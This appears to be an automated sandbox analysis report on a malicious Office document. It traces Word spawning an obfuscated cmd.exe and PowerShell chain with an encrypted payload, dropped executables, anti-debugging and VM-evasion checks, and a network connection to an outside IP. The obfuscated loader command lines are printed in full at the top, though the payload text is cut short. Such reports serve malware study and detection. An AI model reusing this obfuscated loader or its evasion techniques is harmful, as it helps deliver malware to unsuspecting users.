Source: unknownProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' sZtnQKPXfin tPnBwwUdwXHCBdzjtJKuOqvuKmaW BmZKpmNbJBbn & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %rMupwtlKItwSVuz%=vSoctSmfSlDXI&&set %EcEPnDFGqliEs%=p&&set %cfipuRzErTzb%=o^w&&set %hIYPuqMRDKImfnp%=bOowOXAzrPZZ&&set %vNtQYdsDuna%=!%EcEPnDFGqliEs%!&&set %PWMpNCalaDaEmbr%=jpNizzqW&&set %XdYnIfiqNSKFsn%=e^r&&set %ijpdjstoGZYzc%=!%cfipuRzErTzb%!&&set %qwCZwGU%=s&&set %PatJHZXiRmCjzSY%=MDHXnkJmjsS&&set %kMRAvAklRLEh%=he&&set %SwZZNuPNYjB%=ll&&!%vNtQYdsDuna%!!%ijpdjstoGZYzc%!!%XdYnIfiqNSKFsn%!!%qwCZwGU%!!%kMRAvAklRLEh%!!%SwZZNuPNYjB%! '( [ruNtIMe.INteRoPSErVicES.mARsHAL]::([RUNTiMe.inTEROpsERVIces.maRShal].GetmEMbeRs()[1].nAME).invoKE( [runtIME.iNTEROPsErvIcES.mARShAl]::sEcurEsTRINGtOgLOBalalLOCaNSi( $('76492d1116743f0423413b16050a5345MgB8ADIATwBrAGkAZwAvADcASQBOAGMAUwAvAHMASQBsAFUAUQB5AGUAaABaAEEAPQA9AHwAZgBkADcAMQA2AGYAZAA4AGQAZgBjADAANwA2ADgANgA0ADIANAA2ADQAZAAyAGYAYgAxADEAYQA0ADQAYgAwADEAZQA4ADkAOAA2ADAAOABjADMAZgA1ADAA
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell '( [ruNtIMe.INteRoPSErVicES.mARsHAL]::([RUNTiMe.inTEROpsERVIces.maRShal].GetmEMbeRs()[1].nAME).invoKE( [runtIME.iNTEROPsErvIcES.mARShAl]::sEcurEsTRINGtOgLOBalalLOCaNSi( $('76492d1116743f0423413b16050a5345MgB8ADIATwBrAGkAZwAvADcASQBOAGMAUwAvAHMASQBsAFUAUQB5AGUAaABaAEEAPQA9AHwAZgBkADcAMQA2AGYAZAA4AGQAZgBjADAANwA2ADgANgA0ADIANAA2ADQAZAAyAGYAYgAxADEAYQA0ADQAYgAwADEAZQA4ADkAOAA2ADAAOABjADMAZgA1ADAANgA3ADUAMwAxADAAYwAwAGQANwA5ADkAOQA5AGQAZgA3AGIAMQBmAGEANQBiADIANgA0AGYAYwAzADEAMABiADIANQAwADUAZgAxADMAMwBlADgAMQBmADMANwA1AGIAZQBlADEAYgAyADgAOAA0ADEAOAA1AGQAYgAzADQAMAA3AGYANQAyAGYAOQA1ADgAMwBhADUANgA4AGIAMwA2ADMAYQA5ADYANABiADMANAA5ADcAMAA4ADIAYwA0AGQANQAxAGIAMQBhADUAYgAxAGEAYgBhAGQANwBhAGUAOAA5ADEAMwAwADkAOQA5ADQANABjADIAMwBiADQAYwAwADUAMQBlADAAOAA0AGMAYwA0ADgAOQBhAGIAYgBjADcAYgBjADIAOAA4ADcAMQBhAGUANAAyAGYAYwBjAGUAYgAxADIANgAyADcAMQA3AGUANAA5ADAAZAA0ADcAMABlADcAMgBkADkAYgBhADIANQBmADAAYgA4AGMANABiADMAOABmADEAOABlADQAMQAxAGQAZAAzAGQAZABjAGYAMQBiAGQ
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' sZtnQKPXfin tPnBwwUdwXHCBdzjtJKuOqvuKmaW BmZKpmNbJBbn & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %rMupwtlKItwSVuz%=vSoctSmfSlDXI&&set %EcEPnDFGqliEs%=p&&set %cfipuRzErTzb%=o^w&&set %hIYPuqMRDKImfnp%=bOowOXAzrPZZ&&set %vNtQYdsDuna%=!%EcEPnDFGqliEs%!&&set %PWMpNCalaDaEmbr%=jpNizzqW&&set %XdYnIfiqNSKFsn%=e^r&&set %ijpdjstoGZYzc%=!%cfipuRzErTzb%!&&set %qwCZwGU%=s&&set %PatJHZXiRmCjzSY%=MDHXnkJmjsS&&set %kMRAvAklRLEh%=he&&set %SwZZNuPNYjB%=ll&&!%vNtQYdsDuna%!!%ijpdjstoGZYzc%!!%XdYnIfiqNSKFsn%!!%qwCZwGU%!!%kMRAvAklRLEh%!!%SwZZNuPNYjB%! '( [ruNtIMe.INteRoPSErVicES.mARsHAL]::([RUNTiMe.inTEROpsERVIces.maRShal].GetmEMbeRs()[1].nAME).invoKE( [runtIME.iNTEROPsErvIcES.mARShAl]::sEcurEsTRINGtOgLOBalalLOCaNSi( $('76492d1116743f0423413b16050a5345MgB8ADIATwBrAGkAZwAvADcASQBOAGMAUwAvAHMASQBsAFUAUQB5AGUAaABaAEEAPQA9AHwAZgBkADcAMQA2AGYAZAA4AGQAZgBjADAANwA2ADgANgA0ADIANAA2ADQAZAAyAGYAYgAxADEAYQA0ADQAYgAwADEAZQA4ADkAOAA2ADAAOABjADMAZgA1ADAAJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell '( [ruNtIMe.INteRoPSErVicES.mARsHAL]::([RUNTiMe.inTEROpsERVIces.maRShal].GetmEMbeRs()[1].nAME).invoKE( [runtIME.iNTEROPsErvIcES.mARShAl]::sEcurEsTRINGtOgLOBalalLOCaNSi( $('76492d1116743f0423413b16050a5345MgB8ADIATwBrAGkAZwAvADcASQBOAGMAUwAvAHMASQBsAFUAUQB5AGUAaABaAEEAPQA9AHwAZgBkADcAMQA2AGYAZAA4AGQAZgBjADAANwA2ADgANgA0ADIANAA2ADQAZAAyAGYAYgAxADEAYQA0ADQAYgAwADEAZQA4ADkAOAA2ADAAOABjADMAZgA1ADAANgA3ADUAMwAxADAAYwAwAGQANwA5ADkAOQA5AGQAZgA3AGIAMQBmAGEANQBiADIANgA0AGYAYwAzADEAMABiADIANQAwADUAZgAxADMAMwBlADgAMQBmADMANwA1AGIAZQBlADEAYgAyADgAOAA0ADEAOAA1AGQAYgAzADQAMAA3AGYANQAyAGYAOQA1ADgAMwBhADUANgA4AGIAMwA2ADMAYQA5ADYANABiADMANAA5ADcAMAA4ADIAYwA0AGQANQAxAGIAMQBhADUAYgAxAGEAYgBhAGQANwBhAGUAOAA5ADEAMwAwADkAOQA5ADQANABjADIAMwBiADQAYwAwADUAMQBlADAAOAA0AGMAYwA0ADgAOQBhAGIAYgBjADcAYgBjADIAOAA4ADcAMQBhAGUANAAyAGYAYwBjAGUAYgAxADIANgAyADcAMQA3AGUANAA5ADAAZAA0ADcAMABlADcAMgBkADkAYgBhADIANQBmADAAYgA4AGMANABiADMAOABmADEAOABlADQAMQAxAGQAZAAzAGQAZABjAGYAMQBiAGQ
May try to detect the Windows Explorer process (often used for injection)Show sources
Source: WINWORD.EXE, 00000001.00000002.24909080897.006D0000.00000002.sdmpBinary or memory string: Progman
Source: WINWORD.EXE, 00000001.00000002.24909080897.006D0000.00000002.sdmpBinary or memory string: Program Manager
Source: WINWORD.EXE, 00000001.00000002.24909080897.006D0000.00000002.sdmpBinary or memory string: Shell_TrayWnd

Anti Debugging:

barindex
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSystem information queried: KernelDebuggerInformation
Checks if the current process is being debuggedShow sources
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Contains functionality to dynamically determine API callsShow sources
Source: C:\Windows\System32\PartitionClu.exeCode function: 8_2_003E206F VirtualAlloc,memcpy,memcpy,LoadLibraryA,GetProcAddress,8_2_003E206F
Contains functionality to read the PEBShow sources
Source: C:\Users\Public\276299.exeCode function: 6_2_00421CD0 mov eax, dword ptr fs:[00000030h]6_2_00421CD0
Source: C:\Users\Public\276299.exeCode function: 7_2_003E1CD0 mov eax, dword ptr fs:[00000030h]7_2_003E1CD0
Source: C:\Windows\System32\PartitionClu.exeCode function: 8_2_003E1CD0 mov eax, dword ptr fs:[00000030h]8_2_003E1CD0
Source: C:\Windows\System32\PartitionClu.exeCode function: 9_2_003E1CD0 mov eax, dword ptr fs:[00000030h]9_2_003E1CD0
Contains functionality which may be used to detect a debugger (GetProcessHeap)Show sources
Source: C:\Users\Public\276299.exeCode function: 6_2_002D2095 GetLastError,GetProcessHeap,RtlAllocateHeap,lstrcmp,GetProcessHeap,HeapFree,SetLastError,GetCurrentProcess,GetLastError,wsprintfA,SetLastError,GetCurrentProcessId,6_2_002D2095
Enables debug privilegesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Creates guard pages, often used to prevent reverse engineering and debuggingShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory allocated: page read and write | page guard

Malware Analysis System Evasion:

barindex
Checks the free space of harddrivesShow sources
Source: C:\Users\Public\276299.exeFile Volume queried: C:\ FullSizeInformation
Contains functionality to enumerate running servicesShow sources
Source: C:\Users\Public\276299.exeCode function: EnumServicesStatusExW,OpenServiceW,7_2_003E999F
Source: C:\Users\Public\276299.exeCode function: EnumServicesStatusExW,GetLastError,7_2_003E9933
Source: C:\Windows\System32\PartitionClu.exeCode function: EnumServicesStatusExW,OpenServiceW,9_2_003E999F
Source: C:\Windows\System32\PartitionClu.exeCode function: EnumServicesStatusExW,GetLastError,9_2_003E9933
Contains long sleeps (>= 3 min)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Enumerates the file systemShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Found large amount of non-executed APIsShow sources
Source: C:\Users\Public\276299.exeAPI coverage: 7.3 %
Source: C:\Windows\System32\PartitionClu.exeAPI coverage: 4.8 %
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3936Thread sleep time: -922337203685477s >= -60000s
Source: C:\Users\Public\276299.exe TID: 4044Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\PartitionClu.exe TID: 2152Thread sleep time: -120000s >= -60000s
Queries disk information (often used to detect virtual machines)Show sources
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEFile opened: PhysicalDrive0
Sample execution stops while process was sleeping (likely an evasion)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
Program exit pointsShow sources
Source: C:\Windows\System32\PartitionClu.exeAPI call chain: ExitProcess graph end nodegraph_9-6749
Source: C:\Windows\System32\PartitionClu.exeAPI call chain: ExitProcess graph end nodegraph_9-6673
Queries a list of all running processesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation

Hooking and other Techniques for Hiding and Protection:

barindex
System process connects to network (likely due to code injection or exploit)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeNetwork Connect: 66.198.240.37 80
Uses known network protocols on non-standard portsShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 4143
Source: unknownNetwork traffic detected: HTTP traffic on port 49175 -> 4143
Stores large binary data to the registryShow sources
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OfficeSoftwareProtectionPlatform\data\bd8d549b-fa1b-4da2-9c24-f5d4140d06ce 0
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
